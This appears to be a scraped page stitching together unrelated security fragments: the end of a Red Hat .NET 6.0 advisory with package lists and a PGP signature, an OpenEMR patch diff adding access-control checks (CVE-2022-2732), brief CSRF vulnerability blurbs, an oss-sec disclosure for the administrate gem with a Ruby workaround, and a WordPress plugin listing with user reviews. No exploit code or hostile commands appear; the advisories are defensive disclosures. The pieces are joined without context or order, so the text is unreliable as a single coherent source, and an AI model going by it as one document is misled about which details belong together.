dotnet-runtime-6.0-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-6.0.108-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.108-1.el9_0.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.8-1.el9_0.x86_64.rpm  
dotnet-templates-6.0-6.0.108-1.el9_0.x86_64.rpm  
dotnet6.0-debuginfo-6.0.108-1.el9_0.x86_64.rpm  
dotnet6.0-debugsource-6.0.108-1.el9_0.x86_64.rpm  
netstandard-targeting-pack-2.1-6.0.108-1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-host-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.108-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.108-1.el9_0.aarch64.rpm  
dotnet6.0-debuginfo-6.0.108-1.el9_0.aarch64.rpm  
dotnet6.0-debugsource-6.0.108-1.el9_0.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-host-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.108-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.108-1.el9_0.s390x.rpm  
dotnet6.0-debuginfo-6.0.108-1.el9_0.s390x.rpm  
dotnet6.0-debugsource-6.0.108-1.el9_0.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-host-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.108-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.108-1.el9_0.x86_64.rpm  
dotnet6.0-debuginfo-6.0.108-1.el9_0.x86_64.rpm  
dotnet6.0-debugsource-6.0.108-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-34716  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvPznNzjgjWX9erEAQhE7g//WmUIKe/mrkqc47qvEzMggFKNbiNuaydm  
OzjMbyvAJcZJewU43OmqEpl6GZpdQ30wN2zJSUlVrC+At+yDBarHmGzsByr0BfQz  
vI4LTAZII7pB/EIFNg6Blpfccpzafp0aLcOlv7YqLUOZAbaESaPrQ2n9yi4bF0m3  
wb9Q8AscyvLM5w2dsJC2/9fnPXs9Ze/eq5YExKnQq+E+K/tqUd/tOWZvZYsHax/c  
NaiyygYicSRf4OGmFsM69p2toI7mFdszlHdtQZmqiNP3lAZlVbRfPGUF8W/pnjmM  
iRj67/yn93MNypabmAKc6LciJS8vVXNCmGREtSVqqIzVwrqDq/CVmq9lDkKfEpvI  
fTBv4OozdKwBI6lHV54FUAX8w/EJElcTxToS3dnQjx/OMZXQaqc3/06oZ/IHMLQ6  
TOVTXUTaZkiV0okWLhZSfIGkpD408kHuW/bTcHsUag/INJ4f3I5j2can3h+Pdqfo  
6bg9ZOblT4rj6Up9fmDgA0eMcAwnoX4PQrkUQwk5vgRDYN/EtfNmNsjYL7PBkYQe  
ojyUdGD+EnvFBUrAsZIqmgkBi9NL92OLAIqNQ37TFKuLF99VGkNyc0Z+rtHrepNI  
54pcFGsNB+BmXhGBk9aIyEquZqnjhWR2xcbYWo267Oub++neEeAaDnnRayBoJq7H  
X7T+kpNjL+w=0gK7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6043-01

Improper Privilege Management in GitHub repository openemr/openemr prior to 7.0.0.1.

@@ -17,8 +17,18 @@

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

  

//ensure user has proper access

if (!AclMain::aclCheckCore('patients', 'amendment')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Amendments")\]);

exit;

}

$editAccess = AclMain::aclCheckCore('patients', 'amendment', '', 'write');

$addAccess = ($editAccess || AclMain::aclCheckCore('patients', 'amendment', '', 'addonly'));

  

if (isset($\_POST\['mode'\])) {

if (!CsrfUtils::verifyCsrfToken($\_POST\["csrf\_token\_form"\])) {

CsrfUtils::csrfNotVerified();

@@ -28,6 +38,10 @@

$created\_time = date('Y-m-d H:i');

if ($\_POST\["amendment\_id"\] == "") {

// New. Insert

if (!$addAccess) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Amendment Add")\]);

exit;

}

$query = "INSERT INTO amendments SET

amendment\_date = ?,

amendment\_by = ?,

@@ -50,6 +64,10 @@

} else {

$amendment\_id = $\_POST\['amendment\_id'\];

// Existing. Update

if (!$editAccess) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Amendment Edit")\]);

exit;

}

$query = "UPDATE amendments SET

amendment\_date = ?,

amendment\_by = ?,

@@ -102,12 +120,9 @@

$resultSet = sqlStatement($query, array($amendment\_id));

}

  

// Check the ACL

$haveAccess = AclMain::aclCheckCore('patients', 'trans');

$onlyRead = ( $haveAccess ) ? 0 : 1;

$onlyRead = ( $editAccess || ($addAccess && empty($amendment\_id)) ) ? 0 : 1;

$onlyRead = ( $onlyRead || (!empty($amendment\_status)) ) ? 1 : 0;

$customAttributes = ( $onlyRead ) ? array("disabled" => "true") : null;

  

?>

  

<html\>

CVE-2022-2732: bug fix e4 · openemr/openemr@2973592

The Easy Username Updater WordPress plugin before 1.0.5 does not implement CSRF checks, which could allow attackers to make a logged in admin change any user's username includes the admin

CVE-2022-2355

Cross-site request forgery (CSRF) vulnerability in administrate 0.1.4 and earlier allows remote attackers to hijack the user's OAuth autorization code.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**oss-sec mailing list archives**

_From_: Tute Costa <tute () thoughtbot com>  
_Date_: Fri, 1 Apr 2016 13:42:37 -0400  

Cross-site request forgery (CSRF) vulnerability in administrate 0.1.4
and earlier allows remote attackers to hijack the user's OAuth
autorization code.

Versions Affected:  0.1.4 and below
Fixed Versions:     0.1.5

Impact
------

\`Administrate::ApplicationController\` actions didn't have CSRF
protection. Remote attackers can hijack user's sessions and use any
functionality that administrate exposes on their behalf.

Releases
--------

The 0.1.5 release is available at
https://rubygems.org/gems/administrate and
https://github.com/thoughtbot/administrate.

Upgrade Process
---------------

Upgrade administrate version at least to 0.1.5.

Workarounds
-----------

You can reopen Administrate's \`ApplicationController\` to add CSRF
protection to your application:

\`\`\`ruby
module Administrate
  class ApplicationController < ActionController::Base
    protect\_from\_forgery with: :exception
  end
end
\`\`\`

Credits
-------
Thanks to Jason Yeo of SRC:CLR for finding and reporting this vulnerability.

**Current thread:**

*   **Cross-site request forgery (CSRF) vulnerability in administrate gem** _Tute Costa (Apr 01)_

CVE-2016-3098: Cross-site request forgery (CSRF) vulnerability in administrate gem

Cross-Site Request Forgery (CSRF) vulnerability in Rich Reviews by Starfish plugin <= 1.9.14 at WordPress allows an attacker to delete reviews.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of August 2, 2022 and is not available for download. This closure is temporary, pending a full review.

Very bad plugin. Google doesn't show the snippets. When I ask this to the support, they said that I need to wait more. But I've already waited more than 1 year! And still no Google snippets. Go with much more a better plugin.

After a week and no respons i deactivated the plugin. I, and support of Starfish, was not able to activate the license. I need to go on. I have a waiting customer.

This guys will help you everytime! Thanks for such simple and effective tool. Regards, Alex

The plugin code contains a bunch of errors. For example, you will never see a warning if you have not rated a review, even if the rating field in the settings is required. Very bad localization. Many text strings in the plugin are not translated at all, as they are hardcoded. Finally, reviews are sent multiple times. Several duplicate records appear in the database and the same number of notifications are sent to e-mail. So, I does NOT recommend this plugin at all!

Плагин не умеет в локализацию.

doesn't have product as an option.. definitely don't recommend for google snippet.

Read all 115 reviews

“Rich Reviews by Starfish” is open source software. The following people have contributed to this plugin.

Contributors

Tag

#csrf